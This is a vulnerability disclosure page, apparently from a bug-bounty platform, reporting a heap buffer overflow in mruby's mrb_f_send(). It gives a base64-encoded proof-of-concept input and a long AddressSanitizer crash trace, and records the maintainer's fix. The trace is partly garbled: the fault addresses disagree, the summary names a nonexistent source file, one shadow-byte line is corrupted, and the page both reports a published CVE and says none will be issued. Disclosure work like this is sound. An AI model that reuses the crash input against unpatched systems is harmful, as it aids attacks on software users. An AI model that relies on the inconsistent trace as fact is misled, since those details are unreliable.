

# Heap-based Buffer Overflow in mruby/mruby

0

✓ Valid

Reported on Feb 12th 2022

## Description

Heap Overflow occurs in mrb\_f\_send().

commit : 38b164ace7d6ae1c367883a3d67d7f559783faad

## Proof of Concept

```
$ echo -ne "c2VuZCJzZW5kIiwic2VuZCIsInNlbnQlLCJzZW5kIiwic2VuZCIsInNlbnQlLCJzZW5kIiwic2VuZCIsInNlbnQlLCJzZW5kIiwic2VuZCIsInNlbnQlCg=="
```

```
# ASAN
```

```
$ ./bin/mruby poc
```

```
=====
```

```
==160090==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c000000000: READ of size 8 at 0x60c000000000 thread T0
```

```
#0 0x58752d in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:695:12
#1 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
#2 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
#3 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
#4 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
#5 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
#6 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
#7 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
#8 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
#9 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
#10 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
#11 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
#12 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
#13 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
#14 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
#15 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
```

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```
#16 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
#17 0x59ce54 in mrb_vm_exec /home/alkyne/mruby-debug/src/vm.c:1633:18
#18 0x58c1da in mrb_vm_run /home/alkyne/mruby-debug/src/vm.c:1128:12

#19 0x586949 in mrb_top_run /home/alkyne/mruby-debug/src/vm.c:3037:12
#20 0x68dd7b in mrb_load_exec /home/alkyne/mruby-debug/mrbgems/mruby-cc
#21 0x68ef5b in mrb_load_detect_file_cxt /home/alkyne/mruby-debug/mrbge
#22 0x4cd28f in main /home/alkyne/mruby-debug/mrbgems/mruby-bin-mruby/t
#23 0x7ffff7a690b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/
#24 0x41d70d in _start (/home/alkyne/mruby-debug/bin/mruby.asan+0x41d70d)
```

0x60c000000c0 is located 0 bytes to the right of 128-byte region [0x60c00000000] allocated by thread T0 here:

```
#0 0x4988e9 in realloc (/home/alkyne/mruby-debug/bin/mruby.asan+0x4988e9)
#1 0x5f52b5 in mrb_default_allocf /home/alkyne/mruby-debug/src/state.c:100
#2 0x65521e in mrb_realloc_simple /home/alkyne/mruby-debug/src/gc.c:226
#3 0x6557a4 in mrb_realloc /home/alkyne/mruby-debug/src/gc.c:240:8
#4 0x6558d0 in mrb_malloc /home/alkyne/mruby-debug/src/gc.c:256:10
#5 0x4d06cc in ary_new_capa /home/alkyne/mruby-debug/src/array.c:37:35
#6 0x4d0c13 in ary_new_from_values /home/alkyne/mruby-debug/src/array.c:100
#7 0x4d0b38 in mrb_ary_new_from_values /home/alkyne/mruby-debug/src/array.c:113
#8 0x5b7a1f in mrb_vm_exec /home/alkyne/mruby-debug/src/vm.c:2605:17
#9 0x58c1da in mrb_vm_run /home/alkyne/mruby-debug/src/vm.c:1128:12
#10 0x586949 in mrb_top_run /home/alkyne/mruby-debug/src/vm.c:3037:12
#11 0x68dd7b in mrb_load_exec /home/alkyne/mruby-debug/mrbgems/mruby-cc
#12 0x68ef5b in mrb_load_detect_file_cxt /home/alkyne/mruby-debug/mrbge
#13 0x4cd28f in main /home/alkyne/mruby-debug/mrbgems/mruby-bin-mruby/t
#14 0x7ffff7a690b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/
```

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/alkyne/mruby-debug/src/mrb\_vm\_run.c:1128:12 in mrb\_vm\_run  
Shadow bytes around the buggy address:

```
0x0c187fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
=>0x0c187fff8010: 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa
0x0c187fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
```

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0x0c18/+++8060: ta ta ta ta ta ta ta ta ta ta ta ta ta ta ta ta ta  
Shadow byte legend (one shadow byte represents 8 application bytes):  
Addressable: 00  
  
Partially addressable: 01 02 03 04 05 06 07  
Heap left redzone: fa  
Freed heap region: fd  
Stack left redzone: f1  
Stack mid redzone: f2  
Stack right redzone: f3  
Stack after return: f5  
Stack use after scope: f8  
Global redzone: f9  
Global init order: f6  
Poisoned by user: f7  
Container overflow: fc  
Array cookie: ac  
Intra object redzone: bb  
ASan internal: fe  
Left alloca redzone: ca  
Right alloca redzone: cb  
Shadow gap: cc  
==160090==ABORTING



## Impact

Heap based Buffer Overflow may lead to exploiting the program, which can allow the attacker to execute arbitrary code.

CVE  
CVE-2022-0631  
(Published)

Vulnerability Type  
CWE-122: Heap-based Buffer Overflow

Severity  
Medium (5.9)

Visibility  
Public

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Status  
Fixed

Found by



alkyne Choi

@alkyne

unranked ▼

Fixed by



Yukihiro "Matz" Matsumoto

@matz

maintainer

This report was seen 457 times.

We are processing your report and will contact the **mruby** team within 24 hours. 9 months ago

alkyne Choi modified the report 9 months ago

We have contacted a member of the **mruby** team and are waiting to hear back 9 months ago

Yukihiro "Matz" Matsumoto modified the report 9 months ago

Yukihiro "Matz" Matsumoto validated this vulnerability 9 months ago

alkyne Choi has been awarded the disclosure bounty ✓

The fix bounty is now up for grabs

Yukihiro "Matz" Matsumoto marked this as fixed in **3.2** with commit **47068a** 9 months ago

Yukihiro "Matz" Matsumoto has been awarded the fix bounty ✓

This vulnerability will not receive a CVE ✗

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